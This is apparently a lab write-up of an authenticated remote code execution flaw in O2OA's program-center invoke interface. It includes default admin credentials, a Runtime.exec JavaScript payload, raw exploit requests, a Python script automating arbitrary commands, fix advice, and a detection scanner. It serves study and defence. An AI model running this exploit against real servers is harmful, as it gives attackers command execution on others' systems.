Vulnerability Overview
O2OA is a free and open-source enterprise and team office platform built around four sub-platforms: portal management, process management, information management, and data management. It offers work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration to cover the management and collaboration needs of an enterprise. O2OA has a remote code execution vulnerability in the invoke interface of its program center: an authenticated administrator can create a service interface configuration whose body is a server-side script, and that script runs on the JVM's JavaScript engine with unrestricted access to Java classes such as java.lang.Runtime. Anyone holding administrator credentials (the default xadmin account in an unhardened install) can therefore execute arbitrary operating-system commands on the server.
Scope of Impact
Affected product: O2OA (invoke interface of the program center; reproduced here on the 6.1.3 image with API version v=6.3)
Identifier: CNVD-2020-18740
Exploitation Process
Pull and start the lab environment with Docker:
docker pull oxnme/o2oa:6.1.3
docker run --name o2server -p 80:80 -p 20010:20010 -p 20020:20020 -p 20030:20030 -d o2oa/o2server
Note that the two commands name different images; the image passed to docker run must be the one you actually pulled.
Default administrator credentials: xadmin / o2 on older releases; newer releases ship with xadmin / o2oa@2022.
Once the container is up, open the web port in a browser (8001 in this lab); it redirects to the O2OA login page:
http://192.168.31.151:8001/x_desktop/index.html
Log in with the default xadmin credentials that match your release.
In the administration console, open Service Management.
Add a new interface configuration.
Paste the following script as the interface body. It runs server-side on the JVM's JavaScript engine, which exposes Java classes directly, so java.lang.Runtime is reachable and the command output can be written back into the HTTP response:
var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream()));
var result = [];
var oneline;
// readLine() returns null at end of stream; stop there instead of pushing the null
while ((oneline = bufReader.readLine()) != null) {
    result.push(oneline);
}
this.response.setBody({ "Result": result }, "application/json");
The interface configuration can also be created directly with the following request. The Authorization header carries the session token obtained from the xadmin login; no other authentication is involved.
The request packet is as follows:
POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Host: 192.168.31.151:20030
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA
Content-Type: application/json

{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n var oneline = bufReader.readLine();\n result.push(oneline);\n if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}
Then execute the interface by its id with the same token. The command runs on the server and its output comes back in the response body (the packet below resends the configuration as the request body, as captured):
The request packet is as follows:
POST /x_program_center/jaxrs/invoke/cmd/execute HTTP/1.1
Host: 192.168.31.151:20030
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA
Content-Type: application/json

{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n var oneline = bufReader.readLine();\n result.push(oneline);\n if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}
Because the command is hard-coded in the script text, each distinct command needs its own interface configuration (or an update to the text of an existing one) before it can be executed.
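The two requests above, scripted end to end, as an added example that is not part of this write-up or of the O2OA project. It generates the server-side script for an arbitrary command (quoting it safely as a JS string literal), posts the configuration to the create endpoint, then calls the execute endpoint. Assumptions: the Authorization value is the session token from the xadmin login, the execute endpoint accepts the same JSON body the captured packet sends, and the execute response carries the script's Result array either at top level or under a data key; base URL, token and command are command-line arguments.

```python
"""Script the O2OA invoke-interface procedure from the write-up.

Added example; not code from the write-up or from the O2OA project. Assumed:
the Authorization header carries the session token returned by the xadmin
login, execute accepts the same JSON body the captured packet sends, and the
execute response carries the script's Result array at top level or under
"data".
Usage: python3 o2oa_invoke.py http://192.168.31.151:20030 <token> "id"
"""
import json
import sys
import urllib.request

# Endpoints taken from the request packets above.
CREATE_PATH = "/x_program_center/jaxrs/invoke?v=6.3"
EXECUTE_PATH = "/x_program_center/jaxrs/invoke/{iface_id}/execute"


def build_script(cmd):
    """Server-side JavaScript that runs `cmd` through java.lang.Runtime and
    returns stdout lines as JSON (the page's technique). json.dumps yields a
    valid JS string literal, so quotes inside `cmd` cannot break the script,
    and the loop stops on the null that readLine() returns at EOF."""
    cmd_literal = json.dumps(cmd)
    return (
        "var proc = java.lang.Runtime.getRuntime().exec(" + cmd_literal + ");\n"
        "var bufReader = new java.io.BufferedReader("
        "new java.io.InputStreamReader(proc.getInputStream()));\n"
        "var result = [];\n"
        "var oneline;\n"
        "while ((oneline = bufReader.readLine()) != null) {\n"
        "  result.push(oneline);\n"
        "}\n"
        'this.response.setBody({"Result": result}, "application/json");\n'
    )


def build_config(iface_id, cmd):
    """Interface configuration in the shape of the page's create request."""
    return {
        "id": iface_id, "name": iface_id, "alias": "", "description": "",
        "enableToken": False, "validated": True, "enable": True,
        "remoteAddrRegex": "", "text": build_script(cmd),
    }


def build_create_request(base, token, iface_id, cmd):
    headers = {"Authorization": token, "Content-Type": "application/json"}
    return base.rstrip("/") + CREATE_PATH, headers, build_config(iface_id, cmd)


def build_execute_request(base, token, iface_id, cmd):
    # The captured packet resends the configuration on execute; mirrored here.
    headers = {"Authorization": token, "Content-Type": "application/json"}
    url = base.rstrip("/") + EXECUTE_PATH.format(iface_id=iface_id)
    return url, headers, build_config(iface_id, cmd)


def post_json(url, headers, body):
    req = urllib.request.Request(
        url, data=json.dumps(body).encode(), headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.loads(resp.read().decode("utf-8", "replace"))


def extract_lines(resp_json):
    """Find the Result array the script placed in the response (assumption:
    top level or under "data"); [] when neither shape is present."""
    candidates = [resp_json]
    if isinstance(resp_json, dict):
        candidates.append(resp_json.get("data"))
    for node in candidates:
        if isinstance(node, dict) and isinstance(node.get("Result"), list):
            return node["Result"]
    return []


def run_command(base, token, cmd, iface_id="cmd"):
    """Create the interface for `cmd`, execute it, return the stdout lines."""
    post_json(*build_create_request(base, token, iface_id, cmd))
    return extract_lines(post_json(*build_execute_request(base, token, iface_id, cmd)))


if __name__ == "__main__":
    base_url, session_token, command = sys.argv[1:4]
    print("\n".join(run_command(base_url, session_token, command)))
```

Runtime.exec with a single string splits it on whitespace without a shell, so pipes and quoting only work if the command is wrapped, e.g. `sh -c '...'`; the generated script keeps the page's single-string form.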
Recommendations for Fixing
Upgrade to a patched O2OA release.
Change the default xadmin password before the system is exposed; the interface configuration that carries the script can only be created with an administrator session, so the default credentials are what turns this into an unauthenticated problem in practice.
Restrict access to the program center (x_program_center, port 20030 in this lab) to administrators, and review existing interface configurations for scripts that reach java.lang.Runtime or other JVM classes.
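A check for the last recommendation, added here as an example and not taken from the write-up or from O2OA: it scans interface configurations in the JSON shape of the captured create request for scripts that reach into the JVM, and picks out access-log lines that hit the invoke endpoint. The configurations and log lines below are constructed; the pattern set covers what the page's payload uses plus the obvious alternatives (ProcessBuilder, Java.type, reflection, file I/O).

```python
"""Flag O2OA interface configurations whose script escapes to the JVM.

Added example (not from the write-up or the O2OA project). Input is a list of
interface configurations shaped like the page's create-request body
(id, name, text, ...) and, separately, access-log lines in combined-log form.
Both samples below are constructed for the demonstration.
"""
import re

# Patterns a legitimate O2OA interface script has no business containing.
JVM_ESCAPE_PATTERNS = {
    "runtime_exec": re.compile(r"java\.lang\.Runtime\b.*?\.exec\s*\(", re.S),
    "process_builder": re.compile(r"\bjava\.lang\.ProcessBuilder\b"),
    "java_type": re.compile(r"\bJava\.type\s*\("),
    "reflection": re.compile(r"\bjava\.lang\.Class\b|\.forName\s*\("),
    "file_io": re.compile(r"\bjava\.io\.(File|FileOutputStream|FileWriter)\b"),
    "script_engine": re.compile(r"\bjavax\.script\b"),
}

# Create and execute both go to this path (see the captured packets).
INVOKE_PATH_RX = re.compile(r'"(POST|PUT)\s+/x_program_center/jaxrs/invoke\b')


def classify_script(text):
    """Names of every JVM-escape pattern found in one interface script."""
    return [name for name, rx in JVM_ESCAPE_PATTERNS.items() if rx.search(text)]


def audit_configs(configs):
    """Return [(interface id, [pattern names])] for suspicious configs only."""
    findings = []
    for cfg in configs:
        hits = classify_script(cfg.get("text", ""))
        if hits:
            findings.append((cfg.get("id"), hits))
    return findings


def invoke_writes_from_log(lines):
    """Access-log lines that created or executed an invoke interface; a SOC can
    alert on these when they fall outside an administrator change window."""
    return [ln for ln in lines if INVOKE_PATH_RX.search(ln)]


# Constructed sample: the page's payload, a benign script, and a variant.
SAMPLE_CONFIGS = [
    {"id": "cmd", "name": "cmd",
     "text": 'var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader('
             'java.lang.Runtime.getRuntime().exec("id").getInputStream()));\n'
             'this.response.setBody({"Result": []}, "application/json");'},
    {"id": "hello", "name": "hello",
     "text": 'this.response.setBody({"msg": "hi"}, "application/json");'},
    {"id": "pb", "name": "pb",
     "text": 'var p = new java.lang.ProcessBuilder("sh", "-c", "id").start();'},
]

# Constructed sample access-log lines (combined log format).
SAMPLE_LOG = [
    '192.168.31.10 - - [27/Aug/2022:04:39:18 +0000] "POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1" 200 312',
    '192.168.31.10 - - [27/Aug/2022:04:39:20 +0000] "POST /x_program_center/jaxrs/invoke/cmd/execute HTTP/1.1" 200 88',
    '192.168.31.11 - - [27/Aug/2022:04:40:01 +0000] "GET /x_desktop/index.html HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for iface_id, hits in audit_configs(SAMPLE_CONFIGS):
        print(f"{iface_id}: {', '.join(hits)}")
    for line in invoke_writes_from_log(SAMPLE_LOG):
        print(line)
```

The script-side patterns only catch direct references; an attacker can still reach Runtime through string concatenation or reflection, so treat a match as a sure finding and a miss as no evidence, and pair the scan with the log check and with restricting who can reach the program center at all.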